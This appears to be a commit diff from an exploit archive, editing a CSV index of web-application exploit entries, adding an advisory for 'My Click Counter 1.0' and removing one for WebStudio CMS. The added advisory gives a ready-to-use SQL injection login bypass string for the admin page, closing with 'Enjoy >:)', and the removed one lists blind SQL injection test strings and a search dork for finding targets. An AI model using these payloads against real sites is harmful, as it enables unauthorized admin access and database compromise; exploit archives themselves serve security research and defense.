10794,platforms/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10796,platforms/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps,0
@ -26563,7 +26563,7 @@ id,file,description,date,author,platform,type,port
23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0
23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
23653,platforms/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0
23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0
@ -28772,7 +28772,7 @@ id,file,description,date,author,platform,type,port
27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0
27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0
27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0
27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0
27083,platforms/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0
27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - addcomment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
27086,platforms/php/webapps/27086.txt,"White Album 2.5 - Pictures.php SQL Injection",2006-01-16,liz0,php,webapps,0

Can't render this file because it is too large.

12
platforms/php/webapps/40987.txt Executable file
View file

@ -0,0 +1,12 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit ' or ''=' for username and password
it should give you access to the admin area. Enjoy >:)

View file

@ -1,32 +0,0 @@
submitted: 09/01/2008 10:01 AM
-----------------------------------------------------------------------------------
Scr!pt : WebStudio CMS
V3rs!0n : >!<
S!t3 : http://www.bdigital.biz/?pageid=214
Dork : Powered by WebStudio
Auth0r : BorN To K!LL
-----------------------------------------------------------------------------------
Exploit :
/index.php?pageid=[Blind SQL]
Compression :
index.php?pageid=1 and 1=1 <<<<< True
index.php?pageid=1 and 1=2 <<<<< False
-----------------------------------------------------------------------------------
Greets :
str0ke , Dr.2 , General C , CcTero0liTi , GolD_M , n all my friends ..
-----------------------------------------------------------------------------------
# milw0rm.com [2008-11-26]